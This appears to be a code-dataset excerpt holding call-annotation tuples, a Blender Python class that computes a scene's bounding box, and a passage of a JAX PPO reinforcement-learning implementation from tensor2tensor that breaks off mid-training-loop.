'(jfile)', False, 'import json\n'), ((378, 17, 378, 37), 'numpy.matrix', 'np.matrix', ({(378, 27, 378, 36): '[1, 0, 0]'}, {}), '([1, 0, 0])', True, 'import numpy as np\n'), ((379, 17, 379, 37), 'numpy.matrix', 'np.matrix', ({(379, 27, 379, 36): '[0, 0, 1]'}, {}), '([0, 0, 1])', True, 'import numpy as np\n'), ((356, 20, 356, 41), 'random.randrange', 'random.randrange', ({(356, 37, 356, 38): '0', (356, 39, 356, 40): '7'}, {}), '(0, 7)', False, 'import random\n'), ((357, 20, 357, 41), 'random.randrange', 'random.randrange', ({(357, 37, 357, 38): '0', (357, 39, 357, 40): '7'}, {}), '(0, 7)', False, 'import random\n'), ((386, 17, 386, 37), 'numpy.matrix', 'np.matrix', ({(386, 27, 386, 36): '[0, 0, 0]'}, {}), '([0, 0, 0])', True, 'import numpy as np\n'), ((387, 17, 387, 37), 'numpy.matrix', 'np.matrix', ({(387, 27, 387, 36): '[1, 0, 1]'}, {}), '([1, 0, 1])', True, 'import numpy as np\n'), ((394, 17, 394, 40), 'numpy.matrix', 'np.matrix', ({(394, 27, 394, 39): '[1, 0, 0, 0]'}, {}), '([1, 0, 0, 0])', True, 'import numpy as np\n'), ((395, 17, 395, 40), 'numpy.matrix', 'np.matrix', ({(395, 27, 395, 39): '[0, 0, 0, 1]'}, {}), '([0, 0, 0, 1])', True, 'import numpy as np\n'), ((402, 17, 402, 40), 'numpy.matrix', 'np.matrix', ({(402, 27, 402, 39): '[0, 0, 0, 0]'}, {}), '([0, 0, 0, 0])', True, 'import numpy as np\n'), ((403, 17, 403, 40), 'numpy.matrix', 'np.matrix', ({(403, 27, 403, 39): '[1, 0, 0, 1]'}, {}), '([1, 0, 0, 1])', True, 'import numpy as np\n'), ((410, 17, 410, 43), 'numpy.matrix', 'np.matrix', ({(410, 27, 410, 42): '[1, 0, 0, 0, 0]'}, {}), '([1, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((411, 17, 411, 43), 'numpy.matrix', 'np.matrix', ({(411, 27, 411, 42): '[0, 0, 0, 0, 1]'}, {}), '([0, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((418, 17, 418, 43), 'numpy.matrix', 'np.matrix', ({(418, 27, 418, 42): '[0, 0, 0, 0, 0]'}, {}), '([0, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((419, 17, 419, 43), 'numpy.matrix', 'np.matrix', ({(419, 27, 419, 42): '[1, 0, 0, 0, 1]'}, {}), '([1, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((426, 17, 426, 49), 'numpy.matrix', 'np.matrix', ({(426, 27, 426, 48): '[1, 0, 0, 0, 0, 0, 0]'}, {}), '([1, 0, 0, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((427, 17, 427, 49), 'numpy.matrix', 'np.matrix', ({(427, 27, 427, 48): '[0, 0, 0, 0, 0, 0, 1]'}, {}), '([0, 0, 0, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((434, 17, 434, 49), 'numpy.matrix', 'np.matrix', ({(434, 27, 434, 48): '[0, 0, 0, 0, 0, 0, 0]'}, {}), '([0, 0, 0, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((435, 17, 435, 49), 'numpy.matrix', 'np.matrix', ({(435, 27, 435, 48): '[1, 0, 0, 0, 0, 0, 1]'}, {}), '([1, 0, 0, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((442, 17, 444, 39), 'numpy.matrix', 'np.matrix', ({(442, 27, 444, 38): '[[0, 0, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((445, 17, 447, 39), 'numpy.matrix', 'np.matrix', ({(445, 27, 447, 38): '[[1, 0, 1], [0, 0, 0], [0, 1, 0]]'}, {}), '([[1, 0, 1], [0, 0, 0], [0, 1, 0]])', True, 'import numpy as np\n'), ((454, 17, 456, 39), 'numpy.matrix', 'np.matrix', ({(454, 27, 456, 38): '[[0, 1, 0], [0, 0, 0], [1, 0, 1]]'}, {}), '([[0, 1, 0], [0, 0, 0], [1, 0, 1]])', True, 'import numpy as np\n'), ((457, 17, 459, 39), 'numpy.matrix', 'np.matrix', ({(457, 27, 459, 38): '[[1, 0, 1], [0, 0, 0], [0, 1, 0]]'}, {}), '([[1, 0, 1], [0, 0, 0], [0, 1, 0]])', True, 'import numpy as np\n'), ((466, 17, 468, 39), 'numpy.matrix', 'np.matrix', ({(466, 27, 468, 38): '[[0, 0, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((469, 17, 471, 39), 'numpy.matrix', 'np.matrix', ({(469, 27, 471, 38): '[[1, 0, 1], [0, 0, 0], [1, 0, 1]]'}, {}), '([[1, 0, 1], [0, 0, 0], [1, 0, 1]])', True, 'import numpy as np\n')]
davidemarelli/sfm_flow
utils/scene_bounding_box.py
7a96d8309cc01b8499347ba0cae882923d82bbcc
import logging from typing import Tuple import bpy from mathutils import Vector from .object import get_objs logger = logging.getLogger(__name__) class SceneBoundingBox(): """Scene bounding box, build a bounding box that includes all objects except the excluded ones.""" ################################################################################################ # Properties # # ============================================================================================== @property def width(self): """Scene's bounding box width.""" return self.x_max - self.x_min # ============================================================================================== @property def depth(self): """Scene's bounding box depth.""" return self.y_max - self.y_min # ============================================================================================== @property def height(self): """Scene's bounding box height.""" return self.z_max - self.z_min # ============================================================================================== @property def floor_center(self): """Scene's bounding center on lower bbox plane.""" return Vector((self.center[0], self.center[1], self.z_min)) ################################################################################################ # Constructor # # ============================================================================================== def __init__(self, scene: bpy.types.Scene, exclude_collections: Tuple[str] = ("SfM_Environment", "SfM_Reconstructions")): self.scene = scene self.exclude_collections = exclude_collections # self.center = Vector() # type: Vector self.x_min = float("inf") # type: float self.x_max = float("-inf") # type: float self.y_min = float("inf") # type: float self.y_max = float("-inf") # type: float self.z_min = float("inf") # type: float self.z_max = float("-inf") # type: float # self.compute() ################################################################################################ # Methods # # ============================================================================================== def compute(self): """Compute the scene bounding box values.""" objs = get_objs(self.scene, exclude_collections=self.exclude_collections, mesh_only=True) logger.debug("Found %i objects in scene %s", len(objs), self.scene.name) for obj in objs: obb = obj.bound_box for i in range(8): p = obj.matrix_world @ Vector(obb[i]) self.x_min = min(self.x_min, p[0]) self.x_max = max(self.x_max, p[0]) self.y_min = min(self.y_min, p[1]) self.y_max = max(self.y_max, p[1]) self.z_min = min(self.z_min, p[2]) self.z_max = max(self.z_max, p[2]) if objs: self.center = Vector(((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self.z_max + self.z_min) / 2)) logger.debug(str(self)) # ============================================================================================== def get_min_vector(self): """Get minimum axis.""" return Vector((self.x_min, self.y_min, self.z_min)) # ============================================================================================== def get_max_vector(self): """Get maximum axis.""" return Vector((self.x_max, self.y_max, self.z_max)) ################################################################################################ # Builtin methods # # ============================================================================================== def __str__(self): return "Scene bbox values: X=({:.3f}, {:.3f}), Y=({:.3f}, {:.3f}), Z=({:.3f}, {:.3f}), Center={}".format( self.x_min, self.x_max, self.y_min, self.y_max, self.z_min, self.z_max, self.center)
[((10, 9, 10, 36), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((42, 15, 42, 67), 'mathutils.Vector', 'Vector', ({(42, 22, 42, 66): '(self.center[0], self.center[1], self.z_min)'}, {}), '((self.center[0], self.center[1], self.z_min))', False, 'from mathutils import Vector\n'), ((54, 22, 54, 30), 'mathutils.Vector', 'Vector', ({}, {}), '()', False, 'from mathutils import Vector\n'), ((92, 15, 92, 59), 'mathutils.Vector', 'Vector', ({(92, 22, 92, 58): '(self.x_min, self.y_min, self.z_min)'}, {}), '((self.x_min, self.y_min, self.z_min))', False, 'from mathutils import Vector\n'), ((97, 15, 97, 59), 'mathutils.Vector', 'Vector', ({(97, 22, 97, 58): '(self.x_max, self.y_max, self.z_max)'}, {}), '((self.x_max, self.y_max, self.z_max))', False, 'from mathutils import Vector\n'), ((84, 26, 86, 65), 'mathutils.Vector', 'Vector', ({(84, 33, 86, 64): '((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self.z_max +\n self.z_min) / 2)'}, {}), '(((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self\n .z_max + self.z_min) / 2))', False, 'from mathutils import Vector\n'), ((76, 39, 76, 53), 'mathutils.Vector', 'Vector', ({(76, 46, 76, 52): 'obb[i]'}, {}), '(obb[i])', False, 'from mathutils import Vector\n')]
funtion/tensor2tensor
tensor2tensor/trax/rlax/ppo.py
339295a276c4bfc93894c474979d0620d14b9710
# coding=utf-8 # Copyright 2019 The Tensor2Tensor Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """PPO in JAX. Notation: B, scalar - batch size T, scalar - number of time-steps in a trajectory, or the value of the padded time-step dimension. OBS, tuple - shape of a singular observation from the environment. Ex: For CartPole-v0 this is (4,) and Pong-v0 it's (210, 160, 3) A, scalar - Number of actions, assuming a discrete space. Policy and Value function signatures: Policy Function :: [B, T] + OBS -> [B, T, A] Value Function :: [B, T] + OBS -> [B, T, 1] Policy and Value Function :: [B, T] + OBS -> ([B, T, A], [B, T, 1]) i.e. the policy net should take a batch of *trajectories* and at each time-step in each batch deliver a probability distribution over actions. NOTE: It doesn't return logits, rather the expectation is that it returns log-probabilities instead. NOTE: The policy and value functions need to take care to not take into account future time-steps while deciding the actions (or value) for the current time-step. Policy and Value Function produces a tuple of the expected output of a policy function and a value function. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import functools import os import pickle import time from absl import logging import gym from jax import grad from jax import jit from jax import lax from jax import numpy as np from jax import random as jax_random import numpy as onp from tensor2tensor.envs import env_problem from tensor2tensor.envs import env_problem_utils from tensor2tensor.trax import jaxboard from tensor2tensor.trax import layers from tensor2tensor.trax import optimizers as trax_opt from tensor2tensor.trax import trax from tensorflow.io import gfile DEBUG_LOGGING = False GAMMA = 0.99 LAMBDA = 0.95 EPSILON = 0.1 EPOCHS = 50 # 100 NUM_OPTIMIZER_STEPS = 100 PRINT_EVERY_OPTIMIZER_STEP = 20 BATCH_TRAJECTORIES = 32 def policy_and_value_net(rng_key, batch_observations_shape, num_actions, bottom_layers_fn=None, two_towers=True): """A policy and value net function.""" # Layers. # Now, with the current logits, one head computes action probabilities and the # other computes the value function. # NOTE: The LogSoftmax instead of the Softmax because of numerical stability. net = None if not two_towers: tower = [] if bottom_layers_fn is None else bottom_layers_fn() tower.extend([ layers.Branch( layers.Serial(layers.Dense(num_actions), layers.LogSoftmax()), layers.Dense(1)) ]) net = layers.Serial(*tower) else: tower1 = [] if bottom_layers_fn is None else bottom_layers_fn() tower2 = [] if bottom_layers_fn is None else bottom_layers_fn() tower1.extend([layers.Dense(num_actions), layers.LogSoftmax()]) tower2.extend([layers.Dense(1)]) net = layers.Branch( layers.Serial(*tower1), layers.Serial(*tower2), ) assert net return net.initialize(batch_observations_shape, rng_key), net def optimizer_fun(net_params, step_size=1e-3): opt = trax_opt.Adam(step_size=step_size, b1=0.9, b2=0.999, eps=1e-08) opt_init = lambda x: (x, opt.tree_init(x)) opt_update = lambda i, g, s: opt.tree_update(i, g, s[0], s[1]) get_params = lambda x: x[0] opt_state = opt_init(net_params) return opt_state, opt_update, get_params # Should this be collect 'n' trajectories, or # Run the env for 'n' steps and take completed trajectories, or # Any other option? # TODO(afrozm): Replace this with EnvProblem? def collect_trajectories(env, policy_fun, num_trajectories=1, policy=env_problem_utils.CATEGORICAL_SAMPLING, max_timestep=None, boundary=20, epsilon=0.1, reset=True, rng=None): """Collect trajectories with the given policy net and behaviour. Args: env: A gym env interface, for now this is not-batched. policy_fun: observations(B,T+1) -> log-probabs(B,T+1, A) callable. num_trajectories: int, number of trajectories. policy: string, "greedy", "epsilon-greedy", or "categorical-sampling" i.e. how to use the policy_fun to return an action. max_timestep: int or None, the index of the maximum time-step at which we return the trajectory, None for ending a trajectory only when env returns done. boundary: int, boundary for padding, used in EnvProblem envs. epsilon: float, the epsilon for `epsilon-greedy` policy. reset: bool, true if we want to reset the envs. The envs are also reset if max_max_timestep is None or < 0 rng: jax rng, splittable. Returns: A tuple (trajectory, number of trajectories that are done) trajectory: list of (observation, action, reward) tuples, where each element `i` is a tuple of numpy arrays with shapes as follows: observation[i] = (B, T_i + 1) action[i] = (B, T_i) reward[i] = (B, T_i) """ assert isinstance(env, env_problem.EnvProblem) # This is an env_problem, run its collect function. return env_problem_utils.play_env_problem_with_policy( env, policy_fun, num_trajectories=num_trajectories, max_timestep=max_timestep, boundary=boundary, policy_sampling=policy, eps=epsilon, reset=reset, rng=rng) # This function can probably be simplified, ask how? # Can we do something much simpler than lax.pad, maybe np.pad? # Others? def get_padding_value(dtype): """Returns the padding value given a dtype.""" padding_value = None if dtype == np.uint8: padding_value = np.uint8(0) elif dtype == np.uint16: padding_value = np.uint16(0) elif dtype == np.float32 or dtype == np.float64: padding_value = 0.0 else: padding_value = 0 assert padding_value is not None return padding_value # TODO(afrozm): Use np.pad instead and make jittable? def pad_trajectories(trajectories, boundary=20): """Pad trajectories to a bucket length that is a multiple of boundary. Args: trajectories: list[(observation, actions, rewards)], where each observation is shaped (t+1,) + OBS and actions & rewards are shaped (t,), with the length of the list being B (batch size). boundary: int, bucket length, the actions and rewards are padded to integer multiples of boundary. Returns: tuple: (padding lengths, reward_mask, padded_observations, padded_actions, padded_rewards) where padded_observations is shaped (B, T+1) + OBS and padded_actions, padded_rewards & reward_mask are shaped (B, T). Where T is max(t) rounded up to an integer multiple of boundary. padded_length is how much padding we've added and reward_mask is 1s for actual rewards and 0s for the padding. """ # Let's compute max(t) over all trajectories. t_max = max(r.shape[0] for (_, _, r) in trajectories) # t_max is rounded to the next multiple of `boundary` boundary = int(boundary) bucket_length = boundary * int(np.ceil(float(t_max) / boundary)) # So all obs will be padded to t_max + 1 and actions and rewards to t_max. padded_observations = [] padded_actions = [] padded_rewards = [] padded_lengths = [] reward_masks = [] for (o, a, r) in trajectories: # Determine the amount to pad, this holds true for obs, actions and rewards. num_to_pad = bucket_length + 1 - o.shape[0] padded_lengths.append(num_to_pad) if num_to_pad == 0: padded_observations.append(o) padded_actions.append(a) padded_rewards.append(r) reward_masks.append(onp.ones_like(r, dtype=np.int32)) continue # First pad observations. padding_config = [(0, num_to_pad, 0)] for _ in range(o.ndim - 1): padding_config.append((0, 0, 0)) padding_config = tuple(padding_config) padding_value = get_padding_value(o.dtype) action_padding_value = get_padding_value(a.dtype) reward_padding_value = get_padding_value(r.dtype) padded_obs = lax.pad(o, padding_value, padding_config) padded_observations.append(padded_obs) # Now pad actions and rewards. assert a.ndim == 1 and r.ndim == 1 padding_config = ((0, num_to_pad, 0),) padded_action = lax.pad(a, action_padding_value, padding_config) padded_actions.append(padded_action) padded_reward = lax.pad(r, reward_padding_value, padding_config) padded_rewards.append(padded_reward) # Also create the mask to use later. reward_mask = onp.ones_like(r, dtype=np.int32) reward_masks.append(lax.pad(reward_mask, 0, padding_config)) return padded_lengths, np.stack(reward_masks), np.stack( padded_observations), np.stack(padded_actions), np.stack(padded_rewards) # TODO(afrozm): JAX-ify this, this is too slow for pong. def rewards_to_go(rewards, mask, gamma=0.99): r"""Computes rewards to go. Reward to go is defined as follows, the discounted reward that we have to yet collect, going forward from this point, i.e.: r2g_t = \sum_{l=0}^{\infty} (\gamma^{l} * reward_{t+l}) Args: rewards: np.ndarray of shape (B, T) of rewards. mask: np.ndarray of shape (B, T) of mask for the rewards. gamma: float, discount factor. Returns: rewards to go, np.ndarray of shape (B, T). """ B, T = rewards.shape # pylint: disable=invalid-name,unused-variable masked_rewards = rewards * mask # (B, T) # We use the following recurrence relation, derived from the equation above: # # r2g[t+1] = (r2g[t] - r[t]) / gamma # # This means we'll need to calculate r2g[0] first and then r2g[1] and so on .. # # **However** this leads to overflows for long sequences: r2g[t] - r[t] > 0 # and gamma < 1.0, so the division keeps increasing. # # So we just run the recurrence in reverse, i.e. # # r2g[t] = r[t] + (gamma*r2g[t+1]) # # This is much better, but might have lost updates since the (small) rewards # at earlier time-steps may get added to a (very?) large sum. # Compute r2g_{T-1} at the start and then compute backwards in time. r2gs = [masked_rewards[:, -1]] # Go from T-2 down to 0. for t in reversed(range(T - 1)): r2gs.append(masked_rewards[:, t] + (gamma * r2gs[-1])) # The list should have length T. assert T == len(r2gs) # First we stack them in the correct way to make it (B, T), but these are # still from newest (T-1) to oldest (0), so then we flip it on time axis. return np.flip(np.stack(r2gs, axis=1), axis=1) @jit def value_loss_given_predictions(value_prediction, rewards, reward_mask, gamma=0.99, epsilon=0.2, value_prediction_old=None): """Computes the value loss given the prediction of the value function. Args: value_prediction: np.ndarray of shape (B, T+1, 1) rewards: np.ndarray of shape (B, T) of rewards. reward_mask: np.ndarray of shape (B, T), the mask over rewards. gamma: float, discount factor. epsilon: float, clip-fraction, used if value_value_prediction_old isn't None value_prediction_old: np.ndarray of shape (B, T+1, 1) of value predictions using the old parameters. If provided, we incorporate this in the loss as well. This is from the OpenAI baselines implementation. Returns: The average L2 value loss, averaged over instances where reward_mask is 1. """ B, T = rewards.shape # pylint: disable=invalid-name assert (B, T) == reward_mask.shape assert (B, T + 1, 1) == value_prediction.shape value_prediction = np.squeeze(value_prediction, axis=2) # (B, T+1) value_prediction = value_prediction[:, :-1] * reward_mask # (B, T) r2g = rewards_to_go(rewards, reward_mask, gamma=gamma) # (B, T) loss = (value_prediction - r2g)**2 # From the baselines implementation. if value_prediction_old is not None: value_prediction_old = np.squeeze(value_prediction_old, axis=2) # (B, T+1) value_prediction_old = value_prediction_old[:, :-1] * reward_mask # (B, T) v_clipped = value_prediction_old + np.clip( value_prediction - value_prediction_old, -epsilon, epsilon) v_clipped_loss = (v_clipped - r2g)**2 loss = np.maximum(v_clipped_loss, loss) # Take an average on only the points where mask != 0. return np.sum(loss) / np.sum(reward_mask) # TODO(afrozm): JAX-ify this, this is too slow for pong. def deltas(predicted_values, rewards, mask, gamma=0.99): r"""Computes TD-residuals from V(s) and rewards. Where a `delta`, i.e. a td-residual is defined as: delta_{b,t} = r_{b,t} + \gamma * v_{b,t+1} - v_{b,t}. Args: predicted_values: ndarray of shape (B, T+1). NOTE: Expects axis 2 was squeezed. These represent V(s_bt) for b < B and t < T+1 rewards: ndarray of shape (B, T) of rewards. mask: ndarray of shape (B, T) of mask for rewards. gamma: float, discount factor. Returns: ndarray of shape (B, T) of one-step TD-residuals. """ # `d`s are basically one-step TD residuals. d = [] _, T = rewards.shape # pylint: disable=invalid-name for t in range(T): d.append(rewards[:, t] + (gamma * predicted_values[:, t + 1]) - predicted_values[:, t]) return np.array(d).T * mask def gae_advantages(td_deltas, mask, lambda_=0.95, gamma=0.99): r"""Computes the GAE advantages given the one step TD-residuals. The formula for a GAE advantage estimator is as follows: A_{bt} = \sum_{l=0}^{\infty}(\gamma * \lambda)^{l}(\delta_{b,t+l}). Internally we just call rewards_to_go, since it is the same computation. Args: td_deltas: np.ndarray of shape (B, T) of one step TD-residuals. mask: np.ndarray of shape (B, T) of mask for the residuals. It maybe the case that the `td_deltas` are already masked correctly since they are produced by `deltas(...)` lambda_: float, lambda parameter for GAE estimators. gamma: float, lambda parameter for GAE estimators. Returns: GAE advantage estimates. """ return rewards_to_go(td_deltas, mask, lambda_ * gamma) def chosen_probabs(probab_observations, actions): """Picks out the probabilities of the actions along batch and time-steps. Args: probab_observations: ndarray of shape `[B, T+1, A]`, where probab_observations[b, t, i] contains the log-probability of action = i at the t^th time-step in the b^th trajectory. actions: ndarray of shape `[B, T]`, with each entry in [0, A) denoting which action was chosen in the b^th trajectory's t^th time-step. Returns: `[B, T]` ndarray with the log-probabilities of the chosen actions. """ B, T = actions.shape # pylint: disable=invalid-name assert (B, T + 1) == probab_observations.shape[:2] return probab_observations[np.arange(B)[:, None], np.arange(T), actions] def compute_probab_ratios(p_new, p_old, actions, reward_mask): """Computes the probability ratios for each time-step in a trajectory. Args: p_new: ndarray of shape [B, T+1, A] of the log-probabilities that the policy network assigns to all the actions at each time-step in each batch using the old parameters. p_old: ndarray of shape [B, T+1, A], same as above, but using old policy network parameters. actions: ndarray of shape [B, T] where each element is from [0, A). reward_mask: ndarray of shape [B, T] masking over probabilities. Returns: probab_ratios: ndarray of shape [B, T], where probab_ratios_{b,t} = p_new_{b,t,action_{b,t}} / p_old_{b,t,action_{b,t}} """ B, T = actions.shape # pylint: disable=invalid-name assert (B, T + 1) == p_old.shape[:2] assert (B, T + 1) == p_new.shape[:2] logp_old = chosen_probabs(p_old, actions) logp_new = chosen_probabs(p_new, actions) assert (B, T) == logp_old.shape assert (B, T) == logp_new.shape # Since these are log-probabilities, we just subtract them. probab_ratios = np.exp(logp_new - logp_old) * reward_mask assert (B, T) == probab_ratios.shape return probab_ratios def clipped_probab_ratios(probab_ratios, epsilon=0.2): return np.clip(probab_ratios, 1 - epsilon, 1 + epsilon) def clipped_objective(probab_ratios, advantages, reward_mask, epsilon=0.2): return np.minimum( probab_ratios * advantages, clipped_probab_ratios(probab_ratios, epsilon=epsilon) * advantages) * reward_mask @jit def ppo_loss_given_predictions(log_probab_actions_new, log_probab_actions_old, value_predictions_old, padded_actions, padded_rewards, reward_mask, gamma=0.99, lambda_=0.95, epsilon=0.2): """PPO objective, with an eventual minus sign, given predictions.""" B, T = padded_rewards.shape # pylint: disable=invalid-name assert (B, T) == padded_actions.shape assert (B, T) == reward_mask.shape _, _, A = log_probab_actions_old.shape # pylint: disable=invalid-name assert (B, T + 1, 1) == value_predictions_old.shape assert (B, T + 1, A) == log_probab_actions_old.shape assert (B, T + 1, A) == log_probab_actions_new.shape # (B, T) td_deltas = deltas( np.squeeze(value_predictions_old, axis=2), # (B, T+1) padded_rewards, reward_mask, gamma=gamma) # (B, T) advantages = gae_advantages( td_deltas, reward_mask, lambda_=lambda_, gamma=gamma) # Normalize the advantages. advantages = (advantages - np.mean(advantages)) / np.std(advantages) # (B, T) ratios = compute_probab_ratios(log_probab_actions_new, log_probab_actions_old, padded_actions, reward_mask) assert (B, T) == ratios.shape # (B, T) objective = clipped_objective( ratios, advantages, reward_mask, epsilon=epsilon) assert (B, T) == objective.shape # () average_objective = np.sum(objective) / np.sum(reward_mask) # Loss is negative objective. return -average_objective @jit def combined_loss_given_predictions(log_probab_actions_new, log_probab_actions_old, value_prediction_new, value_prediction_old, padded_actions, padded_rewards, reward_mask, gamma=0.99, lambda_=0.95, epsilon=0.2, c1=1.0, c2=0.01): """Computes the combined (clipped loss + value loss) given predictions.""" loss_value = value_loss_given_predictions( value_prediction_new, padded_rewards, reward_mask, gamma=gamma, value_prediction_old=value_prediction_old, epsilon=epsilon) loss_ppo = ppo_loss_given_predictions( log_probab_actions_new, log_probab_actions_old, value_prediction_old, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon) entropy_bonus = masked_entropy(log_probab_actions_new, reward_mask) return (loss_ppo + (c1 * loss_value) - (c2 * entropy_bonus), loss_ppo, loss_value, entropy_bonus) @functools.partial(jit, static_argnums=(3,)) def combined_loss(new_params, log_probab_actions_old, value_predictions_old, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, gamma=0.99, lambda_=0.95, epsilon=0.2, c1=1.0, c2=0.01, rng=None): """Computes the combined (clipped loss + value loss) given observations.""" log_probab_actions_new, value_predictions_new = policy_and_value_net_apply( padded_observations, new_params, rng=rng) # (combined_loss, ppo_loss, value_loss, entropy_bonus) return combined_loss_given_predictions( log_probab_actions_new, log_probab_actions_old, value_predictions_new, value_predictions_old, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon, c1=c1, c2=c2) @functools.partial(jit, static_argnums=(2, 3, 4)) def policy_and_value_opt_step(i, opt_state, opt_update, get_params, policy_and_value_net_apply, log_probab_actions_old, value_predictions_old, padded_observations, padded_actions, padded_rewards, reward_mask, c1=1.0, c2=0.01, gamma=0.99, lambda_=0.95, epsilon=0.1, rng=None): """Policy and Value optimizer step.""" # Combined loss function given the new params. def policy_and_value_loss(params): """Returns the combined loss given just parameters.""" (loss, _, _, _) = combined_loss( params, log_probab_actions_old, value_predictions_old, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, c1=c1, c2=c2, gamma=gamma, lambda_=lambda_, epsilon=epsilon, rng=rng) return loss new_params = get_params(opt_state) g = grad(policy_and_value_loss)(new_params) # TODO(afrozm): Maybe clip gradients? return opt_update(i, g, opt_state) def get_time(t1, t2=None): if t2 is None: t2 = time.time() return round((t2 - t1) * 1000, 2) def approximate_kl(log_prob_new, log_prob_old, mask): """Computes the approximate KL divergence between the old and new log-probs. Args: log_prob_new: (B, T+1, A) log probs new log_prob_old: (B, T+1, A) log probs old mask: (B, T) Returns: Approximate KL. """ diff = log_prob_old - log_prob_new # Cut the last time-step out. diff = diff[:, :-1] # Mask out the irrelevant part. diff *= mask[:, :, np.newaxis] # make mask (B, T, 1) # Average on non-masked part. return np.sum(diff) / np.sum(mask) def masked_entropy(log_probs, mask): """Computes the entropy for the given log-probs. Args: log_probs: (B, T+1, A) log probs mask: (B, T) mask. Returns: Entropy. """ # Cut the last time-step out. lp = log_probs[:, :-1] # Mask out the irrelevant part. lp *= mask[:, :, np.newaxis] # make mask (B, T, 1) p = np.exp(lp) * mask[:, :, np.newaxis] # (B, T, 1) # Average on non-masked part and take negative. return -(np.sum(lp * p) / np.sum(mask)) def evaluate_policy(eval_env, get_predictions, boundary, max_timestep=20000, rng=None): """Evaluate the policy.""" avg_rewards = {} for policy in [ env_problem_utils.CATEGORICAL_SAMPLING, env_problem_utils.GUMBEL_SAMPLING, env_problem_utils.EPSILON_GREEDY ]: trajs, _ = env_problem_utils.play_env_problem_with_policy( eval_env, get_predictions, boundary=boundary, max_timestep=max_timestep, reset=True, policy_sampling=policy, rng=rng) avg_rewards[policy] = float(sum( np.sum(traj[2]) for traj in trajs)) / len(trajs) return avg_rewards def maybe_restore_params(output_dir, policy_and_value_net_params): """Maybe restore the params from the checkpoint dir. Args: output_dir: Directory where saved model checkpoints are stored. policy_and_value_net_params: Default params, returned if model is'nt found. Returns: triple (restore (bool), params, iter(int)) where iter is the epoch from which we restored the params, 0 is restore = False. """ model_files = gfile.glob(os.path.join(output_dir, "model-??????.pkl")) if not model_files: return False, policy_and_value_net_params, 0 model_file = sorted(model_files)[-1] model_file_basename = os.path.basename(model_file) # model-??????.pkl i = int(filter(str.isdigit, model_file_basename)) with gfile.GFile(model_file, "rb") as f: policy_and_value_net_params = pickle.load(f) return True, policy_and_value_net_params, i def training_loop( env=None, epochs=EPOCHS, policy_and_value_net_fun=None, policy_and_value_optimizer_fun=None, batch_size=BATCH_TRAJECTORIES, num_optimizer_steps=NUM_OPTIMIZER_STEPS, print_every_optimizer_steps=PRINT_EVERY_OPTIMIZER_STEP, target_kl=0.01, boundary=20, max_timestep=None, max_timestep_eval=20000, random_seed=None, gamma=GAMMA, lambda_=LAMBDA, epsilon=EPSILON, c1=1.0, c2=0.01, output_dir=None, eval_every_n=1000, eval_env=None, done_frac_for_policy_save=0.5, enable_early_stopping=True, env_name=None, ): """Runs the training loop for PPO, with fixed policy and value nets.""" assert env assert output_dir assert env_name gfile.makedirs(output_dir) # Create summary writers and history. train_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "train")) timing_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "timing")) eval_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "eval")) train_sw.text("env_name", env_name) timing_sw.text("env_name", env_name) eval_sw.text("env_name", env_name) jax_rng_key = trax.get_random_number_generator_and_set_seed(random_seed) # Batch Observations Shape = [-1, -1] + OBS, because we will eventually call # policy and value networks on shape [B, T] +_OBS batch_observations_shape = (-1, -1) + env.observation_space.shape assert isinstance(env.action_space, gym.spaces.Discrete) num_actions = env.action_space.n jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2) # Initialize the policy and value network. policy_and_value_net_params, policy_and_value_net_apply = ( policy_and_value_net_fun(key1, batch_observations_shape, num_actions)) # Maybe restore the policy params. If there is nothing to restore, then # iteration = 0 and policy_and_value_net_params are returned as is. restore, policy_and_value_net_params, iteration = ( maybe_restore_params(output_dir, policy_and_value_net_params)) if restore: logging.info("Restored parameters from iteration [%d]", iteration) # We should start from the next iteration. iteration += 1 policy_and_value_net_apply = jit(policy_and_value_net_apply) # Initialize the optimizers. policy_and_value_optimizer = ( policy_and_value_optimizer_fun(policy_and_value_net_params)) (policy_and_value_opt_state, policy_and_value_opt_update, policy_and_value_get_params) = policy_and_value_optimizer num_trajectories_done = 0 last_saved_at = 0 logging.info("Starting the PPO training loop.") for i in range(iteration, epochs): epoch_start_time = time.time() # Params we'll use to collect the trajectories. policy_and_value_net_params = policy_and_value_get_params( policy_and_value_opt_state) # A function to get the policy and value predictions. def get_predictions(observations, rng=None): """Returns log-probs, value predictions and key back.""" key, key1 = jax_random.split(rng, num=2) log_probs, value_preds = policy_and_value_net_apply( observations, policy_and_value_net_params, rng=key1) return log_probs, value_preds, key # Evaluate the policy. policy_eval_start_time = time.time() if ((i + 1) % eval_every_n == 0) or (i == epochs - 1): jax_rng_key, key = jax_random.split(jax_rng_key, num=2) logging.vlog(1, "Epoch [% 6d] evaluating policy.", i) 